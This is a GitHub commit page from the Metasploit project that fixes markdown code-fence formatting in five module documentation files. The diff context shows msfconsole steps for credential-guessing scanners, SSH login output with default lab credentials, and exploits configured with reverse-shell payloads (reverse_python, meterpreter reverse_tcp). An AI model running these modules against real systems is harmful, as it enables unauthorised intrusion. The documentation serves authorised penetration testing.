Skip to content

Commit 598151c

Browse files
committed
Land rapid7#8892 docs format fixup
2 parents 924c3de + 5bf1d91 commit 598151c

File tree

5 files changed

+5
-5
lines changed

5 files changed

+5
-5
lines changed

documentation/modules/auxiliary/scanner/http/cisco_firepower_login.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -17,7 +17,7 @@ https://software.cisco.com/download/release.html?mdfid=286259687&softwareid=2862
1717

1818
1. Make sure Cisco Firepower Management console's HTTPS service is running
1919
2. Start ```msfconsole```
20-
3. ```use auxiliary/scanner/http/cisco_firepower_login.rb
20+
3. ```use auxiliary/scanner/http/cisco_firepower_login.rb```
2121
4. ```set RHOSTS [IP]```
2222
5. Set credentials
2323
6. ```run```

documentation/modules/auxiliary/scanner/ssh/ssh_login.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -14,7 +14,7 @@
1414
5. Do: `run`
1515
6. You will hopefully see something similar to, followed by a session:
1616

17-
````[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '```
17+
```[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '```
1818

1919
## Options
2020

documentation/modules/exploit/linux/http/centreon_useralias_exec.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -187,7 +187,7 @@ finish
187187
## Scenarios
188188

189189
Just a standard run.
190-
190+
```
191191
msf > use exploit/linux/http/centreon_useralias_exec
192192
msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python
193193
payload => cmd/unix/reverse_python

documentation/modules/exploit/linux/http/logsign_exec.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -56,7 +56,7 @@ dns-nameservers 8.8.8.8
5656
1. Install the software as documented above
5757
2. Start `msfconsole`
5858
3. `use exploit/linux/http/logsign_exec`
59-
4. `set rhost 12.0.0.10
59+
4. `set rhost 12.0.0.10`
6060
6. `python/meterpreter/reverse_tcp` is configured as a default payload. Change it if you need. Most of the case, you're okay go with default payload type.
6161
7. `set LHOST 12.0.0.1`
6262
8. `check` and validate that you are seeing following output.

documentation/modules/exploit/windows/browser/firefox_smil_uaf.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -17,7 +17,7 @@ The module includes an option named UsePostHTML which is turned off by default.
1717

1818
1. Start msfconsole
1919
2. Do: ```use exploit/windows/browser/firefox_smil_uaf```
20-
3. Do: ```set payload [PREFERRED PAYLOAD]
20+
3. Do: ```set payload [PREFERRED PAYLOAD]```
2121
4. Do: ```set PAYLOAD [PAYLOAD NAME]```
2222
5. Set payload options as needed
2323
6. Do: ```run```, and have a target browse to the generated URL

0 commit comments

Comments
 (0)